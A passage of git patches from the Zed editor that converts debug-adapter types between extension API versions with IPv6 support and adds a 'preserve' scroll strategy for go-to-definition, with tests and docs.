impl Extension { Ok(dap_binary.map(TryInto::try_into).transpose()?) } Extension::V0_6_0(ext) => { - let build_config_template = build_config_template.into(); + let build_config_template: latest::dap::TaskTemplate = build_config_template.into(); let dap_binary = ext .call_dap_locator_create_scenario( store, &locator_name, - &build_config_template, + &build_config_template.into(), &resolved_label, &debug_adapter_name, ) .await?; - Ok(dap_binary.map(TryInto::try_into).transpose()?) + Ok(dap_binary + .map(|s| latest::DebugScenario::from(s).try_into()) + .transpose()?) 
} Extension::V0_5_0(_) | Extension::V0_4_0(_) @@ -1242,12 +1246,14 @@ impl Extension { Ok(Ok(dap_request.into())) } Extension::V0_6_0(ext) => { - let build_config_template = resolved_build_task.try_into()?; + let build_config_template: latest::dap::TaskTemplate = + resolved_build_task.try_into()?; let dap_request = ext - .call_run_dap_locator(store, &locator_name, &build_config_template) + .call_run_dap_locator(store, &locator_name, &build_config_template.into()) .await? .map_err(|e| anyhow!("{e:?}"))?; + let dap_request: latest::DebugRequest = dap_request.into(); Ok(Ok(dap_request.into())) } Extension::V0_5_0(_) diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs index bc5674b051772e..91d446e1637bac 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_6_0.rs @@ -30,7 +30,6 @@ wasmtime::component::bindgen!({ "zed:extension/process": latest::zed::extension::process, "zed:extension/slash-command": latest::zed::extension::slash_command, "zed:extension/context-server": latest::zed::extension::context_server, - "zed:extension/dap": latest::zed::extension::dap, }, }); @@ -384,3 +383,328 @@ impl ExtensionImports for WasmState { latest::ExtensionImports::make_file_executable(self, path).await } } + +impl From for latest::dap::TcpArguments { + fn from(value: dap::TcpArguments) -> Self { + let [a, b, c, d] = std::net::Ipv4Addr::from_bits(value.host).octets(); + Self { + host: latest::dap::IpAddress::Ipv4((a, b, c, d)), + port: value.port, + timeout: value.timeout, + } + } +} + +impl TryFrom for dap::TcpArguments { + type Error = anyhow::Error; + + fn try_from(value: latest::dap::TcpArguments) -> Result { + let host = match value.host { + latest::dap::IpAddress::Ipv4((a, b, c, d)) => { + std::net::Ipv4Addr::new(a, b, c, d).to_bits() + } + latest::dap::IpAddress::Ipv6((a, b, c, d, e, f, g, h)) => { + let addr = 
std::net::Ipv6Addr::new(a, b, c, d, e, f, g, h); + anyhow::bail!( + "DAP returned IPv6 host {addr}, which the v0.6.0 extension API cannot represent; the extension must be updated to v0.8.0 or later" + ); + } + }; + Ok(Self { + host, + port: value.port, + timeout: value.timeout, + }) + } +} + +impl From for latest::dap::TcpArgumentsTemplate { + fn from(value: dap::TcpArgumentsTemplate) -> Self { + Self { + host: value.host.map(|host| { + let [a, b, c, d] = std::net::Ipv4Addr::from_bits(host).octets(); + latest::dap::IpAddress::Ipv4((a, b, c, d)) + }), + port: value.port, + timeout: value.timeout, + } + } +} + +impl From for dap::TcpArgumentsTemplate { + fn from(value: latest::dap::TcpArgumentsTemplate) -> Self { + Self { + host: value.host.and_then(|host| match host { + latest::dap::IpAddress::Ipv4((a, b, c, d)) => { + Some(std::net::Ipv4Addr::new(a, b, c, d).to_bits()) + } + latest::dap::IpAddress::Ipv6((a, b, c, d, e, f, g, h)) => { + let addr = std::net::Ipv6Addr::new(a, b, c, d, e, f, g, h); + log::warn!( + "Dropping IPv6 host {addr} when handing TCP arguments back to a v0.6.0 extension; update the extension to v0.8.0 or later for IPv6 support" + ); + None + } + }), + port: value.port, + timeout: value.timeout, + } + } +} + +impl From for latest::dap::LaunchRequest { + fn from(value: dap::LaunchRequest) -> Self { + Self { + program: value.program, + cwd: value.cwd, + args: value.args, + envs: value.envs, + } + } +} + +impl From for dap::LaunchRequest { + fn from(value: latest::dap::LaunchRequest) -> Self { + Self { + program: value.program, + cwd: value.cwd, + args: value.args, + envs: value.envs, + } + } +} + +impl From for latest::dap::AttachRequest { + fn from(value: dap::AttachRequest) -> Self { + Self { + process_id: value.process_id, + } + } +} + +impl From for dap::AttachRequest { + fn from(value: latest::dap::AttachRequest) -> Self { + Self { + process_id: value.process_id, + } + } +} + +impl From for latest::DebugRequest { + fn from(value: DebugRequest) 
-> Self { + match value { + DebugRequest::Launch(req) => Self::Launch(req.into()), + DebugRequest::Attach(req) => Self::Attach(req.into()), + } + } +} + +impl From for DebugRequest { + fn from(value: latest::DebugRequest) -> Self { + match value { + latest::DebugRequest::Launch(req) => Self::Launch(req.into()), + latest::DebugRequest::Attach(req) => Self::Attach(req.into()), + } + } +} + +impl From for latest::DebugConfig { + fn from(value: DebugConfig) -> Self { + Self { + label: value.label, + adapter: value.adapter, + request: value.request.into(), + stop_on_entry: value.stop_on_entry, + } + } +} + +impl From for DebugConfig { + fn from(value: latest::DebugConfig) -> Self { + Self { + label: value.label, + adapter: value.adapter, + request: value.request.into(), + stop_on_entry: value.stop_on_entry, + } + } +} + +impl From for latest::dap::TaskTemplate { + fn from(value: dap::TaskTemplate) -> Self { + Self { + label: value.label, + command: value.command, + args: value.args, + env: value.env, + cwd: value.cwd, + } + } +} + +impl From for dap::TaskTemplate { + fn from(value: latest::dap::TaskTemplate) -> Self { + Self { + label: value.label, + command: value.command, + args: value.args, + env: value.env, + cwd: value.cwd, + } + } +} + +impl From for latest::dap::BuildTaskDefinition { + fn from(value: dap::BuildTaskDefinition) -> Self { + match value { + dap::BuildTaskDefinition::ByName(name) => Self::ByName(name), + dap::BuildTaskDefinition::Template(payload) => { + Self::Template(latest::dap::BuildTaskDefinitionTemplatePayload { + locator_name: payload.locator_name, + template: payload.template.into(), + }) + } + } + } +} + +impl From for dap::BuildTaskDefinition { + fn from(value: latest::dap::BuildTaskDefinition) -> Self { + match value { + latest::dap::BuildTaskDefinition::ByName(name) => Self::ByName(name), + latest::dap::BuildTaskDefinition::Template(payload) => { + Self::Template(dap::BuildTaskDefinitionTemplatePayload { + locator_name: 
payload.locator_name, + template: payload.template.into(), + }) + } + } + } +} + +impl From for latest::DebugScenario { + fn from(value: DebugScenario) -> Self { + Self { + label: value.label, + adapter: value.adapter, + build: value.build.map(Into::into), + config: value.config, + tcp_connection: value.tcp_connection.map(Into::into), + } + } +} + +impl From for DebugScenario { + fn from(value: latest::DebugScenario) -> Self { + Self { + label: value.label, + adapter: value.adapter, + build: value.build.map(Into::into), + config: value.config, + tcp_connection: value.tcp_connection.map(Into::into), + } + } +} + +impl From for latest::DebugTaskDefinition { + fn from(value: DebugTaskDefinition) -> Self { + Self { + label: value.label, + adapter: value.adapter, + config: value.config, + tcp_connection: value.tcp_connection.map(Into::into), + } + } +} + +impl From for DebugTaskDefinition { + fn from(value: latest::DebugTaskDefinition) -> Self { + Self { + label: value.label, + adapter: value.adapter, + config: value.config, + tcp_connection: value.tcp_connection.map(Into::into), + } + } +} + +impl From + for latest::dap::StartDebuggingRequestArgumentsRequest +{ + fn from(value: dap::StartDebuggingRequestArgumentsRequest) -> Self { + match value { + dap::StartDebuggingRequestArgumentsRequest::Launch => Self::Launch, + dap::StartDebuggingRequestArgumentsRequest::Attach => Self::Attach, + } + } +} + +impl From + for dap::StartDebuggingRequestArgumentsRequest +{ + fn from(value: latest::dap::StartDebuggingRequestArgumentsRequest) -> Self { + match value { + latest::dap::StartDebuggingRequestArgumentsRequest::Launch => Self::Launch, + latest::dap::StartDebuggingRequestArgumentsRequest::Attach => Self::Attach, + } + } +} + +impl From for latest::dap::StartDebuggingRequestArguments { + fn from(value: dap::StartDebuggingRequestArguments) -> Self { + Self { + configuration: value.configuration, + request: value.request.into(), + } + } +} + +impl From for 
dap::StartDebuggingRequestArguments { + fn from(value: latest::dap::StartDebuggingRequestArguments) -> Self { + Self { + configuration: value.configuration, + request: value.request.into(), + } + } +} + +impl From for latest::DebugAdapterBinary { + fn from(value: DebugAdapterBinary) -> Self { + Self { + command: value.command, + arguments: value.arguments, + envs: value.envs, + cwd: value.cwd, + connection: value.connection.map(Into::into), + request_args: value.request_args.into(), + } + } +} + +impl TryFrom for DebugAdapterBinary { + type Error = anyhow::Error; + + fn try_from(value: latest::DebugAdapterBinary) -> Result { + Ok(Self { + command: value.command, + arguments: value.arguments, + envs: value.envs, + cwd: value.cwd, + connection: value.connection.map(TryInto::try_into).transpose()?, + request_args: value.request_args.into(), + }) + } +} + +impl zed::extension::dap::Host for WasmState { + async fn resolve_tcp_template( + &mut self, + template: dap::TcpArgumentsTemplate, + ) -> wasmtime::Result> { + let result = latest::dap::Host::resolve_tcp_template(self, template.into()).await?; + Ok( + result + .and_then(|args| dap::TcpArguments::try_from(args).map_err(|err| err.to_string())), + ) + } +} diff --git a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs index 24cf0affd77589..8da53ca638c004 100644 --- a/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs +++ b/crates/extension_host/src/wasm_host/wit/since_v0_8_0.rs @@ -1,10 +1,4 @@ -use crate::wasm_host::wit::since_v0_6_0::{ - dap::{ - BuildTaskDefinition, BuildTaskDefinitionTemplatePayload, StartDebuggingRequestArguments, - TcpArguments, TcpArgumentsTemplate, - }, - slash_command::SlashCommandOutputSection, -}; +use crate::wasm_host::wit::since_v0_6_0::slash_command::SlashCommandOutputSection; use crate::wasm_host::wit::{CompletionKind, CompletionLabelDetails, InsertTextFormat, SymbolKind}; use crate::wasm_host::{WasmState, 
wit::ToWasmtimeResult}; use ::http_client::{AsyncBody, HttpRequestExt}; @@ -24,7 +18,7 @@ use project::project_settings::ProjectSettings; use semver::Version; use std::{ env, - net::{IpAddr, Ipv4Addr}, + net::{IpAddr, Ipv4Addr, Ipv6Addr}, path::{Path, PathBuf}, str::FromStr, sync::{Arc, OnceLock}, @@ -104,43 +98,66 @@ impl From } } } -impl TryFrom for extension::StartDebuggingRequestArguments { +impl TryFrom for extension::StartDebuggingRequestArguments { type Error = anyhow::Error; - fn try_from(value: StartDebuggingRequestArguments) -> Result { + fn try_from(value: dap::StartDebuggingRequestArguments) -> Result { Ok(Self { configuration: serde_json::from_str(&value.configuration)?, request: value.request.into(), }) } } -impl From for extension::TcpArguments { - fn from(value: TcpArguments) -> Self { +impl From for IpAddr { + fn from(value: dap::IpAddress) -> Self { + match value { + dap::IpAddress::Ipv4((a, b, c, d)) => IpAddr::V4(Ipv4Addr::new(a, b, c, d)), + dap::IpAddress::Ipv6((a, b, c, d, e, f, g, h)) => { + IpAddr::V6(Ipv6Addr::new(a, b, c, d, e, f, g, h)) + } + } + } +} + +impl From for dap::IpAddress { + fn from(value: IpAddr) -> Self { + match value { + IpAddr::V4(v4) => { + let [a, b, c, d] = v4.octets(); + Self::Ipv4((a, b, c, d)) + } + IpAddr::V6(v6) => { + let [a, b, c, d, e, f, g, h] = v6.segments(); + Self::Ipv6((a, b, c, d, e, f, g, h)) + } + } + } +} + +impl From for extension::TcpArguments { + fn from(value: dap::TcpArguments) -> Self { Self { - host: IpAddr::V4(Ipv4Addr::from_bits(value.host)), + host: value.host.into(), port: value.port, timeout: value.timeout, } } } -impl From for TcpArgumentsTemplate { +impl From for dap::TcpArgumentsTemplate { fn from(value: extension::TcpArgumentsTemplate) -> Self { Self { - host: value.host.and_then(|addr| match addr { - IpAddr::V4(v4) => Some(v4.to_bits()), - IpAddr::V6(_) => None, - }), + host: value.host.map(Into::into), port: value.port, timeout: value.timeout, } } } -impl From for 
extension::TcpArgumentsTemplate { - fn from(value: TcpArgumentsTemplate) -> Self { +impl From for extension::TcpArgumentsTemplate { + fn from(value: dap::TcpArgumentsTemplate) -> Self { Self { - host: value.host.map(|bits| IpAddr::V4(Ipv4Addr::from_bits(bits))), + host: value.host.map(Into::into), port: value.port, timeout: value.timeout, } @@ -238,11 +255,11 @@ impl TryFrom for extension::DebugAdapterBinary { } } -impl From for extension::BuildTaskDefinition { - fn from(value: BuildTaskDefinition) -> Self { +impl From for extension::BuildTaskDefinition { + fn from(value: dap::BuildTaskDefinition) -> Self { match value { - BuildTaskDefinition::ByName(name) => Self::ByName(name.into()), - BuildTaskDefinition::Template(build_task_template) => Self::Template { + dap::BuildTaskDefinition::ByName(name) => Self::ByName(name.into()), + dap::BuildTaskDefinition::Template(build_task_template) => Self::Template { task_template: build_task_template.template.into(), locator_name: build_task_template.locator_name.map(SharedString::from), }, @@ -250,14 +267,14 @@ impl From for extension::BuildTaskDefinition { } } -impl From for BuildTaskDefinition { +impl From for dap::BuildTaskDefinition { fn from(value: extension::BuildTaskDefinition) -> Self { match value { extension::BuildTaskDefinition::ByName(name) => Self::ByName(name.into()), extension::BuildTaskDefinition::Template { task_template, locator_name, - } => Self::Template(BuildTaskDefinitionTemplatePayload { + } => Self::Template(dap::BuildTaskDefinitionTemplatePayload { template: task_template.into(), locator_name: locator_name.map(String::from), }), @@ -901,27 +918,19 @@ impl context_server::Host for WasmState {} impl dap::Host for WasmState { async fn resolve_tcp_template( &mut self, - template: TcpArgumentsTemplate, - ) -> wasmtime::Result> { + template: dap::TcpArgumentsTemplate, + ) -> wasmtime::Result> { maybe!(async { let (host, port, timeout) = ::dap::configure_tcp_connection(task::TcpArgumentsTemplate { port: 
template.port, - host: template - .host - .map(|bits| IpAddr::V4(Ipv4Addr::from_bits(bits))), + host: template.host.map(Into::into), timeout: template.timeout, }) .await?; - let host_bits = match host { - IpAddr::V4(v4) => v4.to_bits(), - IpAddr::V6(_) => { - anyhow::bail!("IPv6 addresses are not supported in the extension API") - } - }; - Ok(TcpArguments { + Ok(dap::TcpArguments { port, - host: host_bits, + host: host.into(), timeout, }) }) From 7632cc3cc287c97288c563cad223967c1fa0d194 Mon Sep 17 00:00:00 2001 From: Dino Date: Wed, 29 Apr 2026 08:29:15 +0100 Subject: [PATCH 090/231] editor: Add preserve scroll strategy for go to definition (#55036) These changes attempt to expand on the work introduced by https://github.com/zed-industries/zed/pull/54778 by introducing a new `GoToDefinitionScrollStrategy::Preserve` variant that attempts to keep the cursor at the same vertical offset within the viewport when navigating to a definition. Most of the machinery for this was already in place. To support cases where the user's scroll position isn't snapped to an exact display row, for example, after scrolling with the mmouse, `Autoscroll::TopRelative` and `Autoscroll::BottomRelative` were updated from `usize` to `ScrollOffset`, allowing fractional offsets. When the cursor is offscreen at the moment the `editor: go to definition` action is invoked, `Preserve` falls back to `Autoscroll::center`, matching the existing default for `go_to_definition_scroll_strategy`. This avoids attempting to preserve an offset where the cursor isn't visible which would lead to the cursor being offscreen when jumping to the definition. Documentation has also been updated to reflect this new strategy value. 
Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Relates to #52173 Release Notes: - Added a new `preserve` option to `go_to_definition_scroll_strategy` that keeps the cursor at the same vertical position within the viewport when navigating to a definition --- assets/settings/default.json | 2 + crates/editor/src/editor.rs | 49 ++++- crates/editor/src/editor_tests.rs | 238 ++++++++++++++++++++++++- crates/editor/src/element.rs | 4 +- crates/editor/src/scroll/autoscroll.rs | 27 +-- crates/repl/src/session.rs | 2 +- crates/settings_content/src/editor.rs | 3 + docs/src/reference/all-settings.md | 9 + 8 files changed, 312 insertions(+), 22 deletions(-) diff --git a/assets/settings/default.json b/assets/settings/default.json index 464587e6290b2f..02d93ece4a3f73 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -361,6 +361,8 @@ // 1. Vertically center the target in the viewport: `center` (default) // 2. Scroll the minimum amount needed to make the target visible: `minimum` // 3. Scroll so the target appears near the top of the viewport: `top` + // 4. Preserve the cursor's vertical position within the viewport, falling back to `center` when the cursor is + // offscreen: `preserve` "go_to_definition_scroll_strategy": "center", // Which level to use to filter out diagnostics displayed in the editor. 
// diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index ee6b2be18b8590..42e4ebb606dfed 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -18340,7 +18340,11 @@ impl Editor { }; let anchor_range = range.to_anchors(&multibuffer.snapshot(cx)); self.change_selections( - SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)).nav_history(true), + SelectionEffects::scroll(Autoscroll::for_go_to_definition( + self.cursor_top_offset(cx), + cx, + )) + .nav_history(true), window, cx, |s| s.select_anchor_ranges([anchor_range]), @@ -19146,8 +19150,11 @@ impl Editor { } editor.change_selections( - SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)) - .nav_history(true), + SelectionEffects::scroll(Autoscroll::for_go_to_definition( + editor.cursor_top_offset(cx), + cx, + )) + .nav_history(true), window, cx, |s| s.select_anchor_ranges(target_ranges), @@ -19163,6 +19170,8 @@ impl Editor { return Navigated::No; }; let pane = workspace.read(cx).active_pane().clone(); + let offset = editor.cursor_top_offset(cx); + window.defer(cx, move |window, cx| { let (target_editor, target_pane): (Entity, Entity) = workspace.update(cx, |workspace, cx| { @@ -19226,8 +19235,10 @@ impl Editor { } target_editor.change_selections( - SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)) - .nav_history(true), + SelectionEffects::scroll(Autoscroll::for_go_to_definition( + offset, cx, + )) + .nav_history(true), window, cx, |s| s.select_anchor_ranges(target_ranges), @@ -19507,7 +19518,10 @@ impl Editor { let Range { start, end } = locations[destination_location_index]; editor.update_in(cx, |editor, window, cx| { - let effects = SelectionEffects::scroll(Autoscroll::for_go_to_definition(cx)); + let effects = SelectionEffects::scroll(Autoscroll::for_go_to_definition( + editor.cursor_top_offset(cx), + cx, + )); editor.unfold_ranges(&[start..end], false, false, cx); editor.change_selections(effects, window, cx, |s| { @@ -25672,7 
+25686,7 @@ impl Editor { } let autoscroll = match scroll_offset { Some(scroll_offset) => { - Autoscroll::top_relative(scroll_offset as usize) + Autoscroll::top_relative(scroll_offset as ScrollOffset) } None => Autoscroll::newest(), }; @@ -26747,6 +26761,27 @@ impl Editor { self.refresh_runnables(None, window, cx); } } + + /// Returns the current cursor's vertical offset, in display rows, from the + /// top of the visible viewport. + /// Returns `None` if the cursor is not currently on screen. + pub fn cursor_top_offset(&self, cx: &mut Context) -> Option { + let visible = self.visible_line_count()?; + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let scroll_top = self.scroll_manager.scroll_position(&display_map, cx).y; + let cursor_display_row = self + .selections + .newest::(&display_map) + .head() + .to_display_point(&display_map) + .row() + .as_f64(); + + match cursor_display_row - scroll_top { + offset if offset < 0.0 || offset >= visible => None, + offset => Some(offset), + } + } } fn edit_for_markdown_paste<'a>( diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index 3a23bb1147b152..b0ea1b86740939 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -49,9 +49,9 @@ use project::{ use serde_json::{self, json}; use settings::{ AllLanguageSettingsContent, DelayMs, EditorSettingsContent, GlobalLspSettingsContent, - IndentGuideBackgroundColoring, IndentGuideColoring, InlayHintSettingsContent, - ProjectSettingsContent, ScrollBeyondLastLine, SearchSettingsContent, SettingsContent, - SettingsStore, + GoToDefinitionScrollStrategy, IndentGuideBackgroundColoring, IndentGuideColoring, + InlayHintSettingsContent, ProjectSettingsContent, ScrollBeyondLastLine, SearchSettingsContent, + SettingsContent, SettingsStore, }; use std::{borrow::Cow, sync::Arc}; use std::{cell::RefCell, future::Future, rc::Rc, sync::atomic::AtomicBool, time::Instant}; @@ -2962,6 +2962,102 @@ async fn 
test_autoscroll(cx: &mut TestAppContext) { }); } +#[gpui::test] +async fn test_autoscroll_relative(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + let mut cx = EditorTestContext::new(cx).await; + + let line_height = cx.update_editor(|editor, window, cx| { + editor.set_vertical_scroll_margin(0, cx); + editor + .style(cx) + .text + .line_height_in_pixels(window.rem_size()) + }); + let window = cx.window; + + // Resize the window such that only 6 lines of text fit on screen. + cx.simulate_window_resize(window, size(px(1000.), 6. * line_height)); + + cx.set_state( + r#"ˇone + two + three + four + five + six + seven + eight + nine + ten + eleven + twelve + thirteen + fourteen + fifteen + "#, + ); + cx.update_editor(|editor, window, cx| { + assert_eq!( + editor.snapshot(window, cx).scroll_position(), + gpui::Point::new(0., 0.0) + ); + }); + + // Placing the cursor at row 7 with a top-relative autoscroll of 2 display + // rows, should land the scroll position's y coordinate at 5.0 (7 - 2). + cx.update_editor(|editor, window, cx| { + editor.change_selections( + SelectionEffects::scroll(Autoscroll::top_relative(2.0)), + window, + cx, + |selections| selections.select_ranges([Point::new(7, 0)..Point::new(7, 0)]), + ); + }); + cx.update_editor(|editor, window, cx| { + assert_eq!( + editor.snapshot(window, cx).scroll_position(), + gpui::Point::new(0., 5.0) + ); + }); + + // Seeing as fractional offsets are supported, with the cursor at row 10 and + // a top-relative autoscroll of 2.5 display rows, the scroll position's y + // coordinate lands at 7.5 (10 - 2.5). 
+ cx.update_editor(|editor, window, cx| { + editor.change_selections( + SelectionEffects::scroll(Autoscroll::top_relative(2.5)), + window, + cx, + |selections| selections.select_ranges([Point::new(10, 0)..Point::new(10, 0)]), + ); + }); + cx.update_editor(|editor, window, cx| { + assert_eq!( + editor.snapshot(window, cx).scroll_position(), + gpui::Point::new(0., 7.5) + ); + }); + + // When the requested offset would scroll past the top of the buffer, + // `scroll_position.y` is clamped to 0 rather than going negative. + cx.update_editor(|editor, window, cx| { + editor.change_selections( + SelectionEffects::scroll(Autoscroll::top_relative(4.0)), + window, + cx, + |selections| selections.select_ranges([Point::new(1, 0)..Point::new(1, 0)]), + ); + }); + + cx.update_editor(|editor, window, cx| { + assert_eq!( + editor.snapshot(window, cx).scroll_position(), + gpui::Point::new(0., 0.0) + ); + }); +} + #[gpui::test] async fn test_exclude_overscroll_margin_clamps_scroll_position(cx: &mut TestAppContext) { init_test(cx, |_| {}); @@ -26371,6 +26467,142 @@ async fn test_goto_definition_contained_ranges(cx: &mut TestAppContext) { assert_eq!(navigated, Navigated::Yes); } +#[gpui::test] +async fn test_goto_definition_preserve_scroll_strategy(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + update_test_editor_settings(cx, &|settings| { + settings.go_to_definition_scroll_strategy = Some(GoToDefinitionScrollStrategy::Preserve); + settings.vertical_scroll_margin = Some(0.0); + }); + + let mut cx = EditorLspTestContext::new_rust( + lsp::ServerCapabilities { + definition_provider: Some(lsp::OneOf::Left(true)), + ..lsp::ServerCapabilities::default() + }, + cx, + ) + .await; + + let window = cx.window; + let line_height = cx.update_editor(|editor, window, cx| { + editor + .style(cx) + .text + .line_height_in_pixels(window.rem_size()) + }); + cx.simulate_window_resize(window, size(px(1000.), 8. 
* line_height)); + + // Build a buffer where `target` is defined on row 10 and called from + // row 20, with the cursor placed on the call site. + let buffer = indoc! { " + // 0 + // 1 + // 2 + // 3 + // 4 + // 5 + // 6 + // 7 + // 8 + // 9 + fn target() // 10 + // 11 + // 12 + // 13 + // 14 + // 15 + // 16 + // 17 + // 18 + // 19 + fn caller() { ˇtarget(); } // 20 + // 21 + // 22 + // 23 + // 24 + // 25 + // 26 + // 27 + // 28 + // 29 + // 30 + "}; + + // Mock the response from the LSP server when requesting to go to a + // definition so as to always jump to the `target` function. + cx.set_request_handler::(|url, _, _| async move { + Ok(Some(lsp::GotoDefinitionResponse::Scalar(lsp::Location { + uri: url.clone(), + range: lsp::Range::new(lsp::Position::new(10, 3), lsp::Position::new(10, 9)), + }))) + }); + + let caller_row = 20.0; + let target_row = 10.0; + let offset = 1.5; + let center_offset = cx.update_editor(|editor, _, _| { + editor + .visible_line_count() + .map(|count| ((count - 1.0) / 2.0).floor()) + .expect("Visible line count should be available") + }); + + // When the cursor is visible inside the viewport, going to a definition + // should preserve that same offset value. + // In this case, with the cursor set at row 20 and the scroll position set + // to 18.5 (20 - 1.5), when going to the definition of `target` in row 10, + // the scroll position should end up at 8.5 (10 - 1.5), so as to preserve + // that same offset of 1.5. 
+ cx.set_state(&buffer); + cx.update_editor(|editor, window, cx| { + editor.set_scroll_position(gpui::Point::new(0.0, caller_row - offset), window, cx); + }); + cx.update_editor(|editor, window, cx| editor.go_to_definition(&GoToDefinition, window, cx)) + .await + .expect("Failed to navigate to definition"); + cx.run_until_parked(); + cx.update_editor(|editor, window, cx| { + assert_eq!( + editor.snapshot(window, cx).scroll_position(), + gpui::Point::new(0.0, target_row - offset), + ); + }); + + // In the case where the cursor ends up outside of the visible viewport, the + // scroll position's offset should be ignored and the center of the viewport + // should be used instead. + // Since the cursor is jumping to row 10, the scroll position's y coordinate + // should end up at 10 minus the offset from the center of the viewport. + cx.set_state(&buffer); + cx.update_editor(|editor, window, cx| { + editor.set_scroll_position(gpui::Point::new(0.0, 0.0), window, cx); + let snapshot = editor.display_snapshot(cx); + let cursor_row = editor + .selections + .newest_display(&snapshot) + .start + .row() + .as_f64(); + let visible_lines = editor + .visible_line_count() + .expect("Visible line count should be available"); + + assert!(cursor_row >= visible_lines, "Cursor should be offscreen"); + }); + + cx.update_editor(|editor, window, cx| editor.go_to_definition(&GoToDefinition, window, cx)) + .await + .expect("Failed to navigate to definition"); + cx.run_until_parked(); + cx.update_editor(|editor, window, cx| { + assert_eq!( + editor.snapshot(window, cx).scroll_position(), + gpui::Point::new(0.0, (target_row - center_offset).max(0.0)), + ); + }); +} + #[gpui::test] async fn test_find_all_references_editor_reuse(cx: &mut TestAppContext) { init_test(cx, |_| {}); diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index 4b719b1474d38d..a6be884058ef52 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -6814,7 +6814,9 @@ impl 
EditorElement { .display_snapshot .display_point_to_anchor(point_for_position.nearest_valid, Bias::Left); editor.change_selections( - SelectionEffects::scroll(Autoscroll::top_relative(line_index)), + SelectionEffects::scroll(Autoscroll::top_relative( + line_index as ScrollOffset, + )), window, cx, |selections| { diff --git a/crates/editor/src/scroll/autoscroll.rs b/crates/editor/src/scroll/autoscroll.rs index 38f0f4b022899f..6bdb60a470e8f8 100644 --- a/crates/editor/src/scroll/autoscroll.rs +++ b/crates/editor/src/scroll/autoscroll.rs @@ -36,11 +36,14 @@ impl Autoscroll { /// Returns the autoscroll strategy configured for navigation to definitions /// and references, based on `go_to_definition_scroll_strategy`. - pub fn for_go_to_definition(cx: &App) -> Self { + pub fn for_go_to_definition(offset: Option, cx: &App) -> Self { match EditorSettings::get_global(cx).go_to_definition_scroll_strategy { GoToDefinitionScrollStrategy::Center => Self::center(), GoToDefinitionScrollStrategy::Minimum => Self::fit(), GoToDefinitionScrollStrategy::Top => Self::focused(), + GoToDefinitionScrollStrategy::Preserve => { + offset.map(Self::top_relative).unwrap_or_else(Self::center) + } } } @@ -50,9 +53,10 @@ impl Autoscroll { Self::Strategy(AutoscrollStrategy::Focused, None) } - /// Scrolls so that the newest cursor is roughly an n-th line from the top. - pub fn top_relative(n: usize) -> Self { - Self::Strategy(AutoscrollStrategy::TopRelative(n), None) + /// Scrolls so that the newest cursor is the given offset (in display rows) + /// from the top of the viewport. + pub fn top_relative(offset: ScrollOffset) -> Self { + Self::Strategy(AutoscrollStrategy::TopRelative(offset), None) } /// Scrolls so that the newest cursor is at the top. @@ -60,9 +64,10 @@ impl Autoscroll { Self::Strategy(AutoscrollStrategy::Top, None) } - /// Scrolls so that the newest cursor is roughly an n-th line from the bottom. 
- pub fn bottom_relative(n: usize) -> Self { - Self::Strategy(AutoscrollStrategy::BottomRelative(n), None) + /// Scrolls so that the newest cursor is the given offset (in display rows) + /// from the bottom of the viewport. + pub fn bottom_relative(offset: ScrollOffset) -> Self { + Self::Strategy(AutoscrollStrategy::BottomRelative(offset), None) } /// Scrolls so that the newest cursor is at the bottom. @@ -91,7 +96,7 @@ impl Into for Option { } } -#[derive(Debug, PartialEq, Eq, Default, Clone, Copy)] +#[derive(Debug, PartialEq, Default, Clone, Copy)] pub enum AutoscrollStrategy { Fit, Newest, @@ -100,10 +105,12 @@ pub enum AutoscrollStrategy { Focused, Top, Bottom, - TopRelative(usize), - BottomRelative(usize), + TopRelative(ScrollOffset), + BottomRelative(ScrollOffset), } +impl Eq for AutoscrollStrategy {} + impl AutoscrollStrategy { fn next(&self) -> Self { match self { diff --git a/crates/repl/src/session.rs b/crates/repl/src/session.rs index 384913844845aa..9b7bd759504623 100644 --- a/crates/repl/src/session.rs +++ b/crates/repl/src/session.rs @@ -795,7 +795,7 @@ impl Session { if move_down { editor.update(cx, move |editor, cx| { editor.change_selections( - SelectionEffects::scroll(Autoscroll::top_relative(8)), + SelectionEffects::scroll(Autoscroll::top_relative(8.0)), window, cx, |selections| { diff --git a/crates/settings_content/src/editor.rs b/crates/settings_content/src/editor.rs index 18a7bd5fd497ce..5c0dd939688326 100644 --- a/crates/settings_content/src/editor.rs +++ b/crates/settings_content/src/editor.rs @@ -831,6 +831,9 @@ pub enum GoToDefinitionScrollStrategy { Minimum, /// Scroll so the target appears near the top of the viewport. Top, + /// Preserve the cursor's vertical position within the viewport, falling + /// back to centering when the cursor is offscreen. + Preserve, } /// Determines when the mouse cursor should be hidden in an editor or input box. 
